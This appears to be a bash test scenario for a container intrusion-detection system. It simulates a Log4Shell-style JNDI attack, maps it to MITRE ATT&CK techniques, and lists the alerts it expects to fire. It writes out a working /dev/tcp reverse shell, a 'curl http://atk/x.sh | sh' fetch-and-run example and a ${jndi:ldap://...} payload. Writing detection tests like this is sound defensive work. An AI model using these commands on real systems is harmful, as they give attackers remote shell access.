#!/bin/bash
# Scenario 8: Log4Shell-style JNDI injection (CVE-2021-44228 class)
#
# Attack shape (without needing an actual vulnerable log4j):
#   1. Attacker sends a request whose payload triggers the victim to
#      open an outbound LDAP(S) connection (389/636/1389) to an
#      attacker-controlled endpoint — this is the telltale Log4Shell
#      network signature.
#   2. The response carries a remote class / command that the victim
#      "deserializes" (here: simulated by curl-piped-to-sh).
#   3. The dropped command spawns a shell and opens a reverse channel.
#
# Detection chain we expect to fire:
#   - Tier 2 novel edge: (ct-web, <LDAP endpoint>, 389) not calibrated
#                        → NovelEdgeAlert, HIGH severity
#   - Tier 1 execve handler: BIT_REMOTE_EXEC when sh runs a curl-piped
#                            command from ephemeral storage
#   - Tier 1 dup2 invariant: socket→stdio redirection in the reverse
#                            shell → ALERT_FD_REDIRECT + Case A kill
#   - Compound Gate: Case A (strict invariant) always kills AND burns
#                    the attacker IP in client_trust.
#
# MITRE ATT&CK:
#   T1190 Exploit Public-Facing Application
#   T1059.004 Command and Scripting Interpreter: Unix Shell
#   T1105 Ingress Tool Transfer
set -e
echo "=== SCENARIO 8: Log4Shell-style JNDI -> RCE ==="
echo ""

# Fake LDAP sink on the host — the attacker endpoint in a real Log4Shell
# exploit. We don't serve a real JNDI payload; we just prove that the
# victim's outbound-to-uncalibrated-port is detected before the payload
# could arrive.
LDAP_PORT=1389
nc -l -p "$LDAP_PORT" >/dev/null 2>&1 &
LDAP_PID=$!
sleep 0.5

HOST_IP=$(docker network inspect causaltrace_ct-net \
    --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}' 2>/dev/null || echo "172.20.0.1")

echo "[Step 1] Victim (ct-web) performs JNDI-style outbound to ${HOST_IP}:${LDAP_PORT}"
docker exec ct-web /bin/sh -c "
    # This is the observable effect of \${jndi:ldap://host/Exploit} in a log line.
    # No actual LDAP protocol — just the TCP edge that Tier 2 sees.
    (echo 'probe' | nc -w 2 ${HOST_IP} ${LDAP_PORT}) 2>/dev/null || true
" 2>&1 || true
echo "  Tier 2 should emit novel-edge alert for (ct-web -> host:${LDAP_PORT})"

sleep 1

# Restart listener so step 2 can connect again — reverse channel path
kill "$LDAP_PID" 2>/dev/null || true
REV_PORT=9999
nc -l -p "$REV_PORT" >/dev/null 2>&1 &
REV_PID=$!
sleep 0.5

echo "[Step 2] Simulated post-exploitation: curl-piped-to-sh reverse shell"
docker exec ct-web /bin/sh -c "
    # What a Log4Shell-delivered payload typically does:
    #   curl http://atk/x.sh | sh
    # We emulate the observable part: sh -c runs a remote-fed command
    # that redirects stdio onto a socket.
    /bin/sh -c 'exec 5<>/dev/tcp/${HOST_IP}/${REV_PORT}; cat <&5 | /bin/sh 2>&5 >&5' \
        2>/dev/null || true
" 2>&1 || true
echo "  Exit code: $? (137 = SIGKILL from dup2 invariant / Case A)"

kill "$REV_PID" 2>/dev/null || true

echo ""
echo "Detection layers that should fire:"
echo "  Tier 2: novel edge (ct-web -> ${HOST_IP}:${LDAP_PORT})"
echo "  Tier 1: execve BIT_REMOTE_EXEC on sh -c with piped payload"
echo "  Tier 1: dup2 socket->stdio -> ALERT_FD_REDIRECT + Case A"
echo "  Trust: attacker IP transitions to TRUST_BURNED after Case A"
echo "  Semantic: Log4Shell-pattern label (T1190 + T1059.004 + T1105)"
echo "=== Scenario 8 complete ==="
